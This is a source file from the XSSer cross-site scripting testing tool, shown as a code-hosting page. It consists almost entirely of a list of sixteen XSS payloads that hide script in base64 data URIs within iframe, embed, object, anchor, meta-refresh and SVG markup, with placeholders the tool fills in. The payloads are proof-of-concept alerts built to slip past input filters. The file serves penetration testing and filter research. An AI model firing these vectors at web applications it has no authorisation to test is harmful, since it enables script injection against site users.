Home Explore Help
Sign In
epsylon
/
xsser
Watch 1
Star 0
Fork 0
Files Issues 0 Pull Requests 0
Tree: 28334db377
Branches Tags
xsser
/
core
/
fuzzing
/
DCP.py

DCP.py 4.4 KB
History Raw

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960 
  1. #!/usr/bin/env python
    2. 

  2. # -*- coding: utf-8 -*-"
    3. 

  3. # vim: set expandtab tabstop=4 shiftwidth=4:
    4. 

  4. """
    5. 

  5. This file is part of the XSSer project, https://xsser.03c8.net
    6. 

  6. 

  7. Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
    8. 

  8. 

  9. xsser is free software; you can redistribute it and/or modify it under
    10. 

  10. the terms of the GNU General Public License as published by the Free
    11. 

  11. Software Foundation version 3 of the License.
    12. 

  12. 

  13. xsser is distributed in the hope that it will be useful, but WITHOUT ANY
    14. 

  14. WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
    15. 

  15. FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
    16. 

  16. details.
    17. 

  17. 

  18. You should have received a copy of the GNU General Public License along
    19. 

  19. with xsser; if not, write to the Free Software Foundation, Inc., 51
    20. 

  20. Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
    21. 

  21. """
    22. 

  22. ## This file contains different XSS fuzzing vectors.
    23. 

  23. ## If you have some new, please email me to [epsylon@riseup.net]
    24. 

  24. ## Happy Cross Hacking! ;)
    25. 

  25. 

  26. DCPvectors = [
    27. 

  27. 		{ 'payload' : """<a href="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></a>[B64]""",
    28. 

  28.           'browser' : """[Data Control Protocol Injection]"""},
    29. 

  29. 		{ 'payload' : """<iframe src="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></[B64]""",
    30. 

  30. 		  'browser' : """[Data Control Protocol Injection]"""},	
    31. 

  31. 		{ 'payload' : """0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]'))""",
    32. 

  32. 		  'browser' : """[Data Control Protocol Injection]"""},
    33. 

  33. 		{ 'payload' : """<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"&#09;&#10;&#11;>Y</a""",
    34. 

  34. 		  'browser' : """[Data Control Protocol Injection]"""},
    35. 

  35. 		{ 'payload' : """<EMBED SRC="data:image/svg+xml;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]" type="image/svg+xml" AllowScriptAccess="always"></EMBED>""",
    36. 

  36. 		  'browser' : """[Data Control Protocol Injection]"""},
    37. 

  37. 		{ 'payload' : """<embed src="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></embed>""",
    38. 

  38. 		  'browser' : """[Data Control Protocol Injection]"""},
    39. 

  39. 		{ 'payload' : """<iframe/src="data:text/html;&Tab;base64&Tab;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
    40. 

  40. 		  'browser' : """[Data Control Protocol Injection]"""},
    41. 

  41. 		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
    42. 

  42. 		  'browser' : """[Data Control Protocol Injection]"""},
    43. 

  43. 		{ 'payload' : """"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
    44. 

  44. 		  'browser' : """[Data Control Protocol Injection]"""},
    45. 

  45. 		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
    46. 

  46. 		  'browser' : """[Data Control Protocol Injection]"""},
    47. 

  47. 		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
    48. 

  48. 		  'browser' : """[Data Control Protocol Injection]"""},
    49. 

  49. 		{ 'payload' : """"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
    50. 

  50. 		  'browser' : """[Data Control Protocol Injection]"""},
    51. 

  51. 		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
    52. 

  52. 		  'browser' : """[Data Control Protocol Injection]"""},
    53. 

  53. 		{ 'payload' : """<object data="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></object>""",
    54. 

  54. 		  'browser' : """[Data Control Protocol Injection]"""},
    55. 

  55. 		{ 'payload' : """<object data=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]></object>​""",
    56. 

  56. 		  'browser' : """[Data Control Protocol Injection]"""},
    57. 

  57. 		{ 'payload' : """data:image/svg+xml;base64,[B64]<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="Y"><script type="text/ecmascript">alert("PAYLOAD");</script></svg>[B64]""",
    58. 

  58.           'browser' : """[Data Control Protocol Injection]""" }
    59. 

  59. 		]
    60. 

  60.